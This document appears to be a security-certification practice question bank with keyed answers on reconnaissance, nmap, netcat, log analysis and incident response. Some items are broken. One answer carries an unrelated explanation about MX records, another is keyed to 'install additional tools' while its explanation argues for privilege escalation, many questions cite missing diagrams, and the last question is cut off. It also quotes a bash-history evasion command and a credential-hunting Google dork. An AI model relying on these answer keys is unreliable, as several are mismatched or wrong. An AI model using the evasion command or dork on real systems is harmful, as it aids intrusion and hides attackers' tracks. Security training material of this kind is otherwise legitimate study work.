The netflow collector that Sams security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data? A.Enable QoS B.Enable netflow compression C.Enable sampling D.None of the above
C.Enabling sampling Explanation: Random or deterministric sampling can help Sams team capture usable flows despite not being able to handle the full throughput of their network. Rnadom sampling will capture a random packet our of every n packets, with nset by the user Detemrinistic sampling simply takes the every nth packet that passes through, so Sam might sample the 1st, 11th,21st and so on. This means that small flows may be missed, but in this case, sampling half of all packets is still possible, meaning most flows will still be captured
Adam knows that necat is useful penetration testin tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool? A.File transfer B.Port scanner C.Encrypted shell D.Reverse shell
C.Encrypted Explanation: Netcat canact as a relay, file transfer tool, reverse shell, TCP banner grabbing, TCP port scanner, and in a multitude of other roles, but it does not include encryption capabilities. If Adam needs to encrypt his data, he will need another toool to perform this task
What term is often used for attackers during a penetration test? A.Black team B.Blue team C.Red team D.Green team
C.Red team Explanation: During penetration tests, red teams are attackers, blue teams are defenders and the white team establishes the rules of engagement and performance metrics for the test
Brian's penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram show here, identify what steps occurs at point B in the NIST SP800-115 process flow Gaining Access -> B ->System Browsing ->Installing additional tools A.Vulnerability scanning B.Discovery C.Escalating privileges D.Pivoting
C.Escalating privileges Explanation: The NIST process focuses on escalating privileges before browsing the system. If Brian was fortunate enough to compromise an administrative account remotely, he could skip this step, but in most cases, his next step is to find a local exploit or privlege escalation flaw that will allow him to have more control over the system
Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort? A.Timing B.Scope C.Exploitation methods D.Authorization
C.Exploitation methods Explanation: Reconnaissance efoorts do not include exploitation, and CHarleen should not expect to need to include exploitation limitations in the rules of engagement. If she was conducting a full penetration test, she would need to make sure she fully understands any concern or limitations her client has about exploitations of vulnerabilities
While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries: Which of the following has not occurred? A.A user has attempted to re-authenticate B.PAM is configured for three retries and will reject any additional retries in the same session C.Fail2ban has blocked ssh login attempts D.Root is attempting to log in via ssh from the local host
C.Fail2ban has blocked ssh login attempts Explanation: This output shows a brute-force attack run against the localhost's root account using ssh. This resulted in the root user attempting to re-authenticate too many times PAM has blocked the retries. Fail2Ban is not set up for this service Thus, this is the one item that has not occurred. If it was enabled, the fail2ban log would read something like this: -2017-07-11 12:00:00,111 fail2ban:actions: WARNING [ssh] Ban 127.0.0.1 -2017-07-11 12:00:00,111 fail2ban,actions:WARNING [ssh] Unban 127.0.0.1
Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches? A.Google whacks B.SuperGoogles C.Google dorks D.Google gizmos
C.Google dorks Explanation: Google dorks are advanced search strings that can help locate information that is otherwise difficult to find. THey can be used to find things like SQL injections, login pages, links, domain-specific information and a host of other datat
What major issue would Charles face if he relied on hashing malware packages to identify malware packages? A.Hashing can be spoofed B.Collisions can result in false positives. C.Hashing cannot identify unknown malware D.Hashing relies on unencrypted malware samples. Use the following network diagram and scenario to answer the next three questions
C.Hashing cannot identify unknown malware Explanation: Relying on hashing means that Charles will only be able to identify the specific versions of malware packages that have already been identified. This is a consistent problem with signature-based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes because of changes meant to avoid signature-based detection systems
Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his refular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay complant with PCI-DSS and protect his vulnerable systems? A.Replace the Windows embedded point-of-sale terminals with standards Windows systems B.Build a customer operating system image that includes the patch C.Identify, implement, and document compensating controls D.Remove the POS terminals from the netowkr until vendor releases a patch.
C.Identify, implement, and document compensating controls Explanation: When a vulnerability
Adam is reviewing his organizations security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search: 'mysqki_connect' ext:inc A.Block MySQL connections from remote hosts B.Initiate the organizations incident response process C.Immediately change MySQL passwords and review configurations D.Change all MySQL connection strings
C.Immediately change MySQL passwords and review configurations Explanation: If this Google search returns information, it will show MySQL connection information, including passwords. Adam should immediately report this finding to management and should recommend that all exposed passwords be changed immediately and that the misconfiguration that resulted in the files being exposed should be fixed and the reason it occurred should be identified. This does not tell you whether MySQL services are exposed remotely and does not mean that an incident has already occurred. At this point, Adam only knows that a misconfiguration has occurred. Changing all of the connection strings wont fix the root issue
While reviewing the command hisotyr for an administrative user, Chris disovers a suspicious command that was captured, shown here: ln /dev/null ~/.bash_history What action was this user attempting to perform? AEnabling the bash history B.Appending the contents of /dev/null to the bash history C.Logging all shell commands to /dev/null D.Allowing remote access from the null shell
C.Logging all shell commands to /dev/null Explanation: This command will prevent commands entered at the bash shell prompt from being logged as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain adminsitrative access from hiding their tracks
Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance? A.High B.Medium C.Low D.He cannot determine this from the information given
C.Low Explanation: Chris knows that domain registration information is publicly available and that his organization controls the data that is published. SInce this does not expose anything that he should not exptect to be accessiblem Chirs should categorize this as low impact
Tiffany needs to asses the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine? A.nmap B.Nessus C.MBSA D.Metasploit
C.MBSA Explanation: The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that can identify installed or missing patches as well as common security misconfigurations. Incorrect answers: A.nmap&B.Nessus Since it is run with administrative rights, it will provide a better view than normal nmap and Nessus scans and provides more detailed information about specific patches that are installed. D.Metasploit provides some limited scanning capabilities but is not the best tool for the situation
Jennifer is an Active Directory domain administrator for her comapny and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems? A.Force a BGP update B.Set up a DNS sinkhole C.Modify the hosts file D.Install an anti-malware application
C.Modify the hosts file Explanation: Jennifer can push an updated hosts file to her domain-connected systems that will direct traffic intended for known bad domains to the localhost or a safe system. She might want to work with a security analyst or other IT staff member to capture queries sent to that system to track any potentially infected workstations. A DNS sinkhole would work only if all the systems were using local DNS Off site users are likely to have DNS settings set by the local networks they connect to. Anti-malware applications may not have an update yet or may fail to detect the malware, and forcing a BGP update for third-party network is likely a bad idea
Attackers have been attempting to log into Alaina's Cisco routers, causing thousands of log entries, and she is worried they may have eventually succeed. Which of the following options should she recommend to resolve this issue? A.Prevent console login via ssh B.Implemejnt a login-block feature with back-off settings C.Move the administrative interface to a protected network D.Disable console access entirely
C.Move the administrative interface to a protected network Explanation: Best practice for most network devices is to put their administrative interfaces on a protected network. Many organizations then require administrators to connect via a jump box, adding another layer of protection. Preventing console access is typically not a desirable in case changes need to be made and a GUI is not available; login-block can help but will only slow down attacks and will not prevent them
A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running? A.Oracle B.Postgres C.MySQL D.Microsoft SQL
C.MySQL Explanation: MySQL uses port 3306 as its default port Incorrect answers: A.Oracle- Oracle uses port 1521 B.Postgres-Postgres uses 5432 D.Microsoft SQL- Microsoft SQL uses 1433/1434
During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most like occurring? A.A regulary scheduled network scan from her companys ISP. B.A vulnerability scan C.Network topology reconnaissance D.Router probes to determine the best routes via BGP disocvery
C.Network topology reconnaissance Explanation Gathering traceroute information about each system in a network can help provide insight into the networks topology, including where routers, switches and other devices may be located. It is not typical for ISPs to conduct unannounced scans, Vulnerability scans would include additional scan traffic Routers do not probe individual systems for BGP discovery
During Geoff's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements: ALLOW Windows 7 version *, Windows 10 version * ALLOW OSX version * ALLOW iOS 8.1, iOS 9 version * ALLOW Android 7.* After deplying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring? A.Insecure clients B.Incorrect NAC client versions C.OS version mismatch D.Patch-level mismatch
C.OS version mismatch Explanation: Geoff built a reasonable initial list of operating system versions, but many devices on a modern network will not matchi this list, causing operating system version mismatch issues with the matching rules he built. He may need to add broader lists of acceptable operating systems, or his organization may need to upgrade or replace devices that cannot be upgraded to acceptable versions
John needs to protect hisorganizations authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important? A.Passwords and PINs B.Passwords and biometrics C.Passwords and token-based authentication D.Token-based authentication and biometrics
C.Password and token-based authentication Explanation: A password combined with token-based authentication can precent brute-force attacks that might succeed against password or password and PIN combination Biometric factors are useful but often have significant maintenance and deployment overhead and are typivally more difficult to use than a token based second factor
Alex has been asked to investigate a call to one of his organizations system administrators that is believe to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major cleint but that their laptop had died. The administrator provided a link to the file, which included the organizations sales data for the quarter. What type of social engineering occurred? A.Baiting B.Quid pro quo C.Pretexting D.Whaling
C.Pretexting Explanation: This is an example of pretexting, which relies on creating a scenario that the victim will believe, resulting in the attacker gaining access.. Incorrect answers: Baiting uses an item or something that the user desires to cause them to fall for a phishing style attack Quid pro quo promises a benefit in exchange for information Whaling is a phishing attack specifically aimed at important users
Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query? A.AFRINIC B.APNIC C.RIPE D.LACNIC
C.RIPE Explanation: brandon should select RIPE, the regional Internet registry for Europe, the Middle East and parts of Central Asia. Incorrect answers: AFRINIC servers Africa APNIC servers Asia/Pacific LACNIC servers LAtin America and the Caribbean
If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans? A.The scans will match B.Scans from location C will show no open ports C.Scans from location C will show fewer open ports D.Scans from location C will show more open ports
C.Scans from location will show fewer open ports Explanation: Most data center firewalls are configured to only allow ports for publicly accessible services through to other networks. Location C is on an internal network so Lauren will probably see more ports than if she tried to scan data center systems from location A, but it is likely that she will see far fewer ports than a portscan of the data center from inside the data center firewall will show
While conducting reconnaissance of his organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management? A.Self-signed certificates do not provide secure encryption for site visitors B.Self-signed certificates can be revoked only by the original creator C.Self-signed certificates will cause warnings or error messages D.None of the above
C.Self-signed certificates will cause warnings or error messages Explanation: Using self-signed certificates for services that will be used by the general public or organizational users outisde of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self-signed, and a self-signed certificate cannot be revoked at all
Geoff wants to prevent spammers from harvesting his organizations public LDAP directory. What technology should he implement? A.Firewall B.An IDS C.Set hard limits D.Require authentication
C.Set hard limits Explanation: LDAP directory servers typically support both soft and hard limits on queries, including the size of the query and how many queries can be conducted in a given time period. Setting a hard limit prevents LDAP users from exceeding the number set. A firewall would be useful to prevent access and an IDS could show abuse. Requiring authentication isnt useful for a public service
As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing? A. Social engineering B.Brute-force username guessing C.Social media profiling D.Phishing
C.Social media profiling Explanation: Chris is performing a type of social media profilinf. While common usernames may not tell him very much, unique usernames or those commonly used by a specific target can help him gather more information about the sites his targets use
During his analysis of malware sample, John reviews the malware files and binaries without running them. What type of analysis is this? A.Automated analysis B.Dynamic analysis C.Static analysis D.Heurisitic analysis
C.Static analysis Explanation: John is performing static analysis, which is analysis performed without running code. He can use tools or manually review the code (and, in fact, is likely to do both)
As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called? A.The red team B.The white team C.The blue team D.The yellow team
C.The blue team Explanation: Internal security teams are typically referred to as the blue team for penetration testing and security exercises. Red teams are attackers, while the white team establishes the rules of engagement and performance metrics for the test
While reviewing Shodan scan data for his organization, John notices the following entry. 'Please try to use SSHv1 for your sessions to avoid transmitting passwords in the clear over the net.' A.The device allows telnet connections B.The is a console port on a nonstandard port C.The device requires sshv1 D.The device is an automated tank gauge Which of the following is false?
C.The device requires sshv1 Explanation: The device allows a telnet connection to port 10001 and identifies itself as an automated tank gauge. John should recommend disabling telnet or protecting the device with a firewall or other security device to preven unauthorized remote access
Ron is reviewing his team's work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here? A.The host was not up B.Not all ports were scanned C.The scan scanned only UDP ports D.The scan was not run as root
C.The scan scanned only UDP servers Explanation: This scan shows only UDP ports. Since most services run as TCP service, this scan wouldnt have identified most common servers. Ron should review the commands that his team issued as part of their exercise. If he finds that nmap was run with a -sU flag, he will have found the issue
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart: service rogueservice stop After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this? A.The service restarted at reboot; she needs to include the "-p", or permanent flag B.The service restarted itself; she needs to delete the binary associated with the service C.The service restarted at reboot; she should add an .override file to stop the service from starting D.A malicious user restarted the service; she needs to ensure users cannot restart services
C.The service restarted at reboot; she should add an .override file to stop the service from starting Explanation: Monica issues a command that only stops a running service. It will restart at reboot unless the scripts that start it are disabled. On modern Ubuntu systems, that is handled by 'upstart' Other service may use init.d scripts. In either case, when asked a question like this, you can quickly identidy this as a provlem that occurred at reboot and remove the answer that isnt likely to be correct
While reviewing web server logs, Danielle notices the following entry. What occurred? '10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200' A.A theme was changed B.A file was not found C.There was an attempt to edit the 404 page D.The 404 page was displayed
C.There was an attempt to edit the 404 page Explanation: Attackers often use built-in editing tools that are inadvertently or purposefully exposed to edit files to inect malicious code. In this case, someone has attempted to modify the 404 file displayed by Wordpress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page
Why does the US gorvernment require Trusted Foundry and related requirements for technology? A.To control prices B.To ensure standards compatibility C.To prevent hardware-level compromise of devices D.To ensure US-based suppier viability for strategic components
C.To prevent hardware-level compromise of devices Explanation: According to the Defense Microelectronics Activity (DMEA) website: DMEA accredits suppliers in the areas of integrated circuit design, aggregation, broker, mask manufacturing, foundry, post processing, packaing,assembly and test services These services cover a broad range of technologies and is intended to support both new and legacy applications, both classified and unclassified," This program acts ro ensure that electronics are not compromised as part od the design process
A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this is bandwidth consumption from the attack itself is not the root problem? A.IP-based blacklisting B.Drop all SYN packets C.Use a connectionrate or volume-limiting filter per IP D.Use a route-blocking filter that analyzes common LOIC routes
C.Use a connectionrate or volume-limiting filter per IP Explanation: Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting host to a connection rate and volume through filters like those provided by the iptables hashlimit plug-in can help. IP-based blacklisting may work for smaller botnets but is difficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping all SYN packets would prevent all TCP connections, and route blocking filters are not a method used to prevent this type of attack. While he's setting up firewall rules, Jeff may also want to investigate a denial-of-service mitigation partner or service in case the attackers move to more advanced methods or do overwhelm his link
After a popular website is hacked, Crhis begins to hear reports that email addresses from his company's domain are listed in the hackers data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own account. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses? A.Reverse the MD5 hashes and the rehash using the companys method and comapre B.Reverse the MD5 and strong company hashes and then compare the password C.Use rainbow tables to recover the passwords from the dump and the rehash using the companys strong method and compare D.Chris cannot accomplish this task; hashes cannot be reversed
C.Use rainbow tables to recover the passwords from the dump and the rehash using the companys strong method and compare Explanation: Rainbow tables exist for most reasonable MD5 passwords, which means that Chris can likely recover the majority of the passwords belongig to his users relatively quickly. Once he is done, he can apply his company's strong hashing method and compare them to the existing hashed passwords his organization stores He may still be better off simply asking all of the impacted users to change their passwords if they reused them for the site and should consider multifactor authentication to avoid the issue in the future
Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him? A.Use sc B.Use wmic C.Use secpol.msc D.Use services.msc
C.Use secpol.msc Explanation: WIndows services can be started and stopped using sc (sc stop 'service') or wmic (wmic service where name= 'service' call ChangeStartmode Disabled) or via the services.msc GUI. secpol.msc controls security policy and will not allow Allan to stop a service
Laura's organization has been receiving a large amount of spam email sent specifically to the email addressed listed in her organizations domain registrations. Which of the following techniques will help her organization limit this type of spam? A.DNS query rate limiting B.CAPTCHAs C.Using a proxy service D.Blacklisting
C.Using a proxy service Explanation: While spam to a registrants email address may seem tirivial, it may mean that important messages related to the domain are missed. The best way to limit the this is to use a privacy or proxy service to register the domain. Many, ig not most, popular registration services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain was previously registered before privacy service, sometimes at an extra charge. Unfortunately, if a domain was previously registered before privacy services or proxies are used, that information can be looked up and used
Tracy believes that a historic version of her target's website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time? A.Time Machine B.Morlock C.Wayback Machine D.Her target's web cache
C.WayBack Machine Explanation: The Wayback Machine and similiar sites capture periodic snapshots of websites from across the Internet, allowing penetration testers and others performing reconnaissance activities to gather information from historic versions of their target sites. This also means that long term data breaches may be archived in sites like these in addtition to search engine caches
Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this? A.where bash B.ls -l bash C.Which bash D.printev bash
C.Which bash Explanation: The which command will show Selah where the bash executable is being run from, typically /bin/bash. If she finds that bash is running from a user directory or somewhere else suspicious, she should immediately report it If youre familiar with the printenv command, option D may be tricky; printev doesnt accept speicifc flags, so Selah would need to pipie the output to grep or to search it manually to find bash there
Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organizations DMZ. How should she rate the likelihood of this occurring? A.Low B.Medium C.High D.There is not enough information for Alex to provide a rating
C.high Explanation: Alex knows that systems that are exposed to the Internet like DMZ systems are constantly being scanned. SHe should rate the likelihood of the scan occurring as high. In fact, there is a good chance that a scan will be occurring while she is typing up her report
Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this? A. nbstat -o B.nbstat -r C.nbstat -s D.nbstat -c
C.nbstat Explanation: To show current netBIOS sessions and their status, Alex can issue nbstat -s command. Incorrect answers: The -c flag shows the NetBIOPS name cache, while the -r command displays the count of NetBIOS names resolved through a WINS server query and by broadcast. There is no -o flag
Lauren wants to identify all the printers on the subnets shse is scanning with nmap. Which of the following nmap commands will not provider her with a list of likely printers? A.nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt B.nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt C.nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D.nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt
C.nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D.nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt Explanation: Using a UDP scan, as shown in option C, with the -sU flag will not properly identify printers since print service ports are TCP ports. The other commands will properly scan and identify many printers based on either their service ports (515,631,9100) or their OS versions
While reviewing netflows for a system on her network, Alice disocvers the following traffic pattern. What is occurring? A.telnet scan B.ssh scan C.ssh scan with unsucessful connection attempts D.sftpscans with unsuccessful connection attempts
C.ssh scan with unsucessful connection attempts Explanation: TCP port 22 indicates that this is most likely a ssh scan, and that the single packet with no response traffice indicates unsuccessful connection attempts. If the system is not normally used for scanning for open ssh servers, Alince shoud look into why it is behaving this way
While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess? A.Send an email via the open port B.Send an SMTP probe C.telnet to the port D.ssh to the port
C.telnet to the port Explanation: Using telnet to connect to remote services to validate their response is a useful technique for service validation. It doesnt always work but can allow you to interact with the service to gather information manually
While conducting active reconnaissance, Lauren discovers a web remote nmanagement application that peears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as? A.username B.showuser C.whoami D. cd c:\Users\%currentuser
C.whoami Explanation: The whoami command will show the username and its domain. This can be useful when determining whether a service is running as a user or a service account
An access control system that relies on the operating system to constrain the ability of a subject to peform operations is an example of what type of access control system? A.A discrentionary access control system B.A role based accedd control system C.A mondatory access control system D.A level-based access control system
C/A mandatory access control system Explanation: A mandatory access control system relies on the operating system to constrain what actions or access a subject can perform on an object. Incorrect answers: Role based access control uses roles determine access to resources Discretionary access control allows subjects to control access to objects that they own or are responsible for. Level based access control is a type of role based access control
While reviewing Apache logs, CYnthia notices the following log entries. What has occurred? 10.0.1.1 - POST /wordpres/wp-content/r57.php?1 200 10.0.1.1 - GET /wordpress/wp-content/r57 .php 200 A.A file was downloaded and verfified B.A file was emailed C.A file was moved to the wp-content directory D.A file was uploaded and verified
D. A file was uploaded and verified Explanation: The POST shows a file being uploaded, and the GET shows an attempt to retrieve it. If Cynthia doesnt expect her system to allow uploads, she should check into what occurred. If she searches for r57.php., she will become much more concerned; it is a remote access tool
Jarret needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS? A.Enable application sharding B.Review each query and implement query optimization C.Implement aggressive aging at the organizations firewall D.Employ a CDN
D. Employ a CDN Explanation: While application sharding and query optimization can help services respond under heavy loads, Jarret's best bet is to work with a content distribution network (CDN) that has built-in DDoS mitigation technologies. This will allow his content to be accessible even if his primaryservice is taken offline and will spread the load to other servers during attacks, even if the CDN's anti-DDoS capabilities cant entirely mitigate the attack Incorrect answers: Aggressive aging can help when impleneted on a firewall and may help somewhat with survivability but is less useful for large-scale DDoS attacks
Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allows through the systems firewall for externally initiated connections? A. 80,135, 139, and 445 B.80,445, and 3389 C.135,139 and 445 D. No ports should be open
D. No ports should be open Explanation: The uses described for the workstation that Geoff is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system
Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs? A.nmap B.cree.py C.MailSnarf D.TheHarvester
D.TheHarvester Explanation: The Harvester is an email collection tool that can automatically gather email addresses from a domain, website, or other source. nmap does not provide an email gathering capability cree.py is a geolocation tool MailSnarf was made up for this question
While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following out. What has occurred? A.The root account has been compromsed B.An account named daemon has been added C.The shadow password file has been modified D./etc/shadow and /etc/passwd cannot be diffed to create a useful comparison
D./etc/shadow and /etc/passwd cannot be diffed to create a useful comparison Explanation: Linux and Unix systems typically keep user account information stored in /etc/passwd, and /etc/shadow contains password and account expiration information Using diff between the two files is not a useful strategy in this scenario
Alex wants to scan a protected network and has gained access to system that can communicate to both his scanning system and the internal network, as shown in he image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A? A.A reflection scan B.A proxy scan C.A randomized host scan D.A ping-through scan
D.A ping-through scan Explanation: While the hostnames cluster1 and cluster1a indicate that there may be a cluster of mail servers, this query does not prove that. Instead, Charleen knows that there are two MC entries for her target. She will also notice that mail hosting is handled by messagelabs, a software-as-a-service provider for email and other managed services, indicating that the public email presence for her target is handled by a specialized company. MXToolbox allows deeper queries about blacklists and SMTP tests, but this image only shows the links to them and does not provide details
Fred conducts a SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belongs to active hosts. What does this mean? A.The machines are unreachable B.The machines are not running SNMP servers C.The community string he used is invalid D.Any or all of the above may be true
D.Any or all of the above may be true Explanation: Since SNMP does not reliable report on closed UDP ports and SNMP servers dont respond to request with invalid community strings, any of these answers could be true. This means that receiving "no response" to an SNMP query can mean that the machines are unreachable (often due to a firewall_, they are not running SNMP, or the community string that was used is incorrect
Which of the following items is not typically included in the rules of engagement for a penetration test? A.Timing B.Authorization C.Scope D.Authorized tools
D.Authorized tools Explanation: The rules of engagement for a penetration test typically describe the scope, timing, authorization and techniques that will be used (or that are prohibited) This helps to ensure that unexpected impacts are minimized and allows both the tester and the target organization to understand what will occur Specifically listing authorized tools is not typical for most rules of engagement
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this? A.Trend B.Availability C.Heuristic D.Behavior
D.Behavior Explanation: Lucy has configured a behavior-based detection. It is likely that a reasonable percentage of the detections will be for legitimate travel for users who typically do not leave the country, but pairing this behavioral detection, behavioral or anomaly detections can help determine whether the login is legitimate
While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this? A.Continue to search for other changes B.Run diff against the password file C.Immediately change her password D.Check the passwd binary against a known good version
D.Check the passwd binary against a known good version Explanation: The passwd binary stands out as having recently changed. THis may be innocous, but if Angela believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious one. She should check the binary against a known good version and then follow her incident response process if it doesnt match
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS? A.Route poisoning B.Anti-malware router filters C.Subdomain whitelisting D.DNS blackholing
D.DNS blackholing Explanation: DNS Blackholing use a list of known malicious domains or OP addresses and relies on listing the domains on an internal DNS serever, which provides a fake reply. INcorrect answers: Route poisoning prevents networks from sending data to a destinad that is invalid. Routers do not typically have an anti-malware filter feature Subdomain whitelisting was made up for this question
As part of her malware analysis process, Caitlynn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is the process known as? A.Static analysis B.Composition C.Dynamic analysis D.Decomposition
D.Decomposition Explanation: Caitlyn is preparing a decomposition diagram that maps the high-level functions to lower-level components. This will allow her to better understand how the malware package works and may help her identify areas she should focus on
Isaax wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host? A.netcat B.telnet C.wget D.FTP
D.FTP Explanation: netcat, telnet and wget can all be used to conduct Isaac's banner-grabbing exercise. FTP will not connect properly to get the banner he wants to see
As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this? A.ssh -t 192.168.34.11 nmap 192.168.34.0/24 B. ssh -R 8080:192.168.34.11:8080 [remote account:remote password] C. ssh -proxy 192.168.11 [remote account:remote password] D.Frank cannot scan multiple ports with a single ssh command
D.Frank cannot scan multiple ports with a single ssh command Explanation: While ssh port forwarding and ssh tunneling are both useful techniques for pivoting from a host that allows access nmap requires a range of ports open for default scans. He could write a script and forward the full range of ports that nmap checks, but none of the commands listed will get him there. If Frank has access to proxychains, he could do this with two commands
During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from results provided by Zenmap? A.There are two nodes on the local network B.There is a firewall at IP address 96.120.24.121 C.There is an IDS at IP 96.120.24.121 D.He should scan the 10.0.2.0/24 network
D.He should scan the 10.0.2.0/24 network Explantion: This scan shows Bob that he is likely on a network using some portion of the 10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what is near him would be a good start. Since the Zenmap scan was run to a single external host, it will not show other hosts on the local network, so there may be more than two nodes on the network. Bob cannot make determinations about what the host at 96.120.24.121 is, beyond a device on the route between the local host and his remote scan destination
CHarles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do? A.Search for use of privileged port in sequential order B.Search for connections to port in the /var/syslog directory C.Log all kernel messages to detect scans D.Install additional tools that can detect scans and send the logs to syslog
D.Install additional tools that can detect scans and send the logs to syslog Explanation: Detecting port scans requires the ability to identify scanning behavior, and the applications that create syslog entries on most default Linux distributions are not set up for this. Charles should identify a tool like psad, an IDS package, or other tool that can track connections and scan behavior and report on it and then use syslog to send those messages to his log collector or SIEM
As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in? A. Vulnerability scanning B. Privilege escalation C.Patching D.Installation additional tools
D.Installation additional tools Explanation: By default Apache does not run as administrative user. In fact, it typically runs as a limited user. To take further useful action, Frank should look for a privilege escalation path that will allow him to gain further access
Ryan's passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4? A.The host does not have a DNS entry B.It is running a service on port 139 C.It is running a service on port 445 D.It is a windows system
D.It is a windows system Explanation: While the system responded on common Windows ports, you cannot determine whether it is a Windows system. It did respond, and both ports 139 and 445 were accessible. When the host the Wireshark capture was conducted from queried DNS, it did not receive a response, including that the system does not have a DNS entry (or at least, it doesnt have one that is available to the host that did the scan and ran the Wireshark capture)
While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. WHat service can he typically expect to run on this port? A.Oracle B.VNC C.IRC D.Microsoft SQL
D.Microsoft SQL Explanation: Microsoft SQL typically runs on TCP ports 1433 and 1434 Oracle's default is 1521 IRC is 6667 VNC is 5900
When Casey scanned a network host, she received the results shown here. What does she know based on the scan results? A.The device is a cisco device B.The device is running CentOS C.The device was built by IBM D.None of the above
